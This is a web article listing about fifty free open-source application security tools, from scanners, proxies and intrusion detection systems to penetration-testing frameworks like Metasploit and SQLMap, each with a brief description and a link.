You are here

57 open source app sec tools: A guide to free application security software

public://pictures/Mike-Perrow-Chief-Editor-TechBeacon.png
Mike Perrow, Freelance writer

Read the updated version of this list: 47 powerful open-source app sec tools you should consider

You don't need to spend a lot of money to introduce high-power security into your application development and delivery agenda. This guide to open-source app sec tools is designed to help teams looking to invest in application security software understand what’s out there in the open-source space, and how to think about the choices. A subsequent guide to commercial app sec vendors will follow. 

Why do you need a guide to free app sec tools? Generally speaking, information about application security can be confusing, because websites typically present the advantages of products without clearly describing the class of solution being offered. This makes it difficult to compare one product to the next. Websites for open source projects typically provide very granular information about a specific tool, which requires the reader to already understand how and why a specific tool is used.

The value of open source app sec tools

Most open source projects are designed for app sec requirements at a smaller scale than commercial vendors tend to target. We believe this list of highly dedicated open source app sec providers should, nevertheless, become familiar to security enthusiasts seeking new, creative approaches to specific kinds of cyber threats.

Some of these OS projects are quite active and frequently updated with new capabilities; others, well, not so much, but they’re worth checking out. Some of the more robust OS tech has been around since the dawn of the web; others are quite new, with growing hordes of followers on Twitter and elsewhere.

Note that a few of the listings here are free “community editions” of higher-grade commercial products. Also note that you can’t identify open source projects by their .org or .net suffixes anymore. As you’ll see, many use the .com convention, and lots of other URL conventions these days.

Andiparos

A fork of the famous Paros Proxy, an open source web application security assessment tool that gives penetration testers the ability to spider websites, analyze content, intercept, and modify requests
Web: https://code.google.com/archive/p/andiparos

 

BackTrack

Called a Linux-based penetration testing arsenal, this distribution is configured with hundreds of security testing tools and scripts
Web: http://www.backtrack-linux.org

 

BeEF

Penetration testing for Open Source
Web: http://beefproject.com

 

Caja

Compiler for making third-party HTML, CSS and JavaScript safe to embed in a website. It uses an object-capability security model to allow for a wide range of flexible security policies.
Web: http://developers.google.com/caja

 

ClamAV

Open source antivirus engine for detecting trojans, viruses, malware & other malicious threats
Web: http://clamav.net

 

DOM Snitch

Experimental Chrome extension that enables developers and testers to identify insecure practices commonly found in client-side code. Developers and testers can observe DOM modifications as they happen inside the browser without the need to step through JavaScript code with a debugger or pause the execution of their application
Web: https://code.google.com/archive/p/domsnitchdomsnitch

 

Ettercap

Called "a comprehensive suite for man in the middle attacks... features sniffing of live connections, content filtering on the fly and many other interesting tricks."
Web: http://ettercap.github.io/ettercap

 

GoLismero

Free software framework for security testing.
Web: http://www.golismero.com

 

Google hacking database (GHDB)

Described by SecTools.org as "a gold mine for security researchers and penetration testers," this site is part of The Exploit Database, "a non-profit project that is provided as a public service by Offensive Security."
Web: https://www.exploit-db.com/google-hacking-database

 

Google application security tools

Google states that these tools "address a gap present in other open-source tools. These tools may require some minor tweaking or compilation to work on your systems." Some are included separately in this list.
Web: https://www.google.com/about/appsecurity/tools

 

Grabber

Web application scanner which can detect many security vulnerabilities in web applications. An open source web application penetration testing tools
Web: http://rgaucher.info/beta/grabber

 

Grendel

Scan web application security tool for finding security vulnerabilities; features are also available for manual penetration testing
Web: https://sourceforge.net/projects/grendel

 

Gruyere

Called “a small, cheesy web application”; allows users to publish snippets of text and store assorted files. Caveat: Gruyere has multiple security bugs ranging from cross-site scripting and cross-site request forgery, to information disclosure, denial of service, and remote code execution
Web: http://google-gruyere.appspot.com

 

Kali

Linux penetration testing
Web: http://kali.org

 

Keyczar

Open source cryptographic toolkit designed to make it easier and safer for developers to use cryptography in their applications. It supports authentication and encryption with both symmetric and asymmetric keys; designed to be an open, extensible and cross-platform compatible.
Web: https://github.com/google/keyczar

 

Kismet

Wireless network detector, sniffer, and intrusion detection system. Kismet works predominately with Wi-Fi (IEEE 802.11) networks, but can be expanded via plug-ins to handle other network types.
Web: http://kismetwireless.org

 

Malwarebytes

Endpoint security malware scanner for Windows.
Web: http://malwarebytes.org

 

Metasploit

Metasploit by Rapid7 Penetration Testing Open Source
Web: http://metasploit.com

 

ModSecurity

WAF open source
Web: http://modsecurity.org

 

Nagios

Monitors the entire IT infrastructure to ensure systems, applications, services, and business processes are functioning properly.
Web: http://nagios.org

 

Native Client (NaCl)

A technology for running native compiled code in the browser. NaCl aims at maintaining operating system portability and safety that people expect from web applications
Web: http://developer.chrome.com/native-client

 

Nikto2

Web server testing tool to find known vulnerable scripts, configuration mistakes and related security problems
Web: http://cirt.net/nikto2

 

Nmap

Penetration testing utility for network discovery and security auditing with NSE scripts that can detect vulnerabilities, misconfiguration and security related information around network services
Web: http://nmap.org

 

NoScript

Firefox addon that provides extra protection for Firefox, Seamonkey and other mozilla-based browsers; allows JavaScript, Java, Flash and other plugins to be executed only by trusted web sites of your choice
Web: http://noscript.net

 

OpenSSH

Secures traffic between two points by tunnelling insecure protocols through an SSH tunnel
Web: http://www.openssh.com

 

OpenVAS

Open source vulnerability scanning suite
Web: http://openvas.org

 

OSSEC

Host based intrusion detection system or HIDS
Web: http://ossec.github.io

 

OWASP

A large class of open source sec testing tools is available at owasp.org
Web: https://www.owasp.org/index.php/Appendix_A:_Testing_Tools

 

Packet Storm

Wide variety of scanner tools for vulnerability and penetration available
Web: http://packetstormsecurity.org/files/tags/scanner

 

Paros Proxy

Testing tool for your security and vulnerability testing. Used to spider/crawl entire sites, then execute canned vulnerability scanner tests
Web: http://www.testingsecurity.com/paros_proxy

 

Powerfuzzer

HTTP protocol based application fuzzer based on many other Open Source fuzzers
Web: http://www.powerfuzzer.com

 

Ratproxy

Designed to overcome the problems users usually face while using other proxy tools for security audits; capable of distinguishing between CSS stylesheets and JavaScript codes
Web: https://code.google.com/archive/p/ratproxy

 

Secunia PSI

A free computer security solution that identifies vulnerabilities in applications on private PCs
Web: http://learn.flexerasoftware.com/SVM-EVAL-Personal-Software-Inspector

 

Security Onion

Linux distribution for intrusion detection, network security monitoring, and log management
Web: http://blog.securityonion.net

 

Skipfish

Active web application security reconnaissance tool. It prepares an interactive sitemap for a site by carrying out a recursive crawl and dictionary tools. Written in C with a custom HTTP stack, it is high performance, easy to use and reliable
Web: https://code.google.com/archive/p/skipfish

 

Snort

Open-source, free and lightweight network intrusion detection system (NIDS) for UNIX derivatives and Windows
Web: http://snort.org

 

SonarQube

SonarQube™ software (previously known as “Sonar”) is an open platform to manage code quality. As such, it covers the 7 axes of code quality.
Web: https://github.com/SonarSource/sonarqube

 

SQLMap

Penetration testing tool, automates the process of finding and exploiting SQL injection vulnerability in a website’s database
Web: http://sqlmap.org

 

Tcpdump

Called "a powerful command-line packet analyzer" on its website, this tool is still used by many as an alternative to the more resource-intensive Wireshark
Web: http://tcpdump.org

 

Vega

Web vulnerability scanner and testing platform; SQL injection, cross-site scripting, etc.
Web: https://subgraph.com/vega

 

W3AF

SQL injection, cross-site scripting detection tool
Web: http://w3af.org

 

Wapiti

Web vulnerability scanner which lets you audit the security of your web applications. It performs black-box testing by scanning web pages and injecting data
Web: http://wapiti.sourceforge.net

 

Watcher

A Fiddler addon to assist penetration testers in passively finding Web app vulnerabilities 
Web: http://websecuritytool.codeplex.com

 

WATOBO

Perform efficient (semi-automated) web application security audits
Web: http://watobo.sourceforge.net/index.html

 

WebScarab

Java-based security framework for analyzing web applications using HTTP or HTTPS protocol. Written in Java, portable to many platforms; offers several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy
Web: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

 

Websecurify

GNUCITIZEN (see the Commercial vendor list)
Web: 

 

Wfuzz

A freely available open source tool for web application penetration testing. It can be used to brute force GET and POST parameters for testing against various kinds of injections like SQL, XSS, LDAP, and many others
Web: http://code.google.com/p/wfuzz

 

SensePost

Vulnerability tools for devices, networks, and apps. Tools include autoDANE, reGeorg, Jack, and the SensePost Maltego Toolset
Web: http://sensepost.com

 

Wireshark

Wireshark Penetration Testing and Packet-level Monitoring Open Source; view traffic in as much detail as you want; follow network streams and find problems
Web: http://wireshark.org

 

Zed Attack Proxy

Also known as Zap. Open source, intercepting proxy which is fork and update of the badly out of date Paros Proxy. Fairly powerful for manual testing, and contains some automated testing features.
Web: https://www.owasp.org

What did we miss?

Are there open source application security providers that we missed? We think of this as a work in progress, so if you believe there are tools that should be added to this list, please let us know in the comments section below.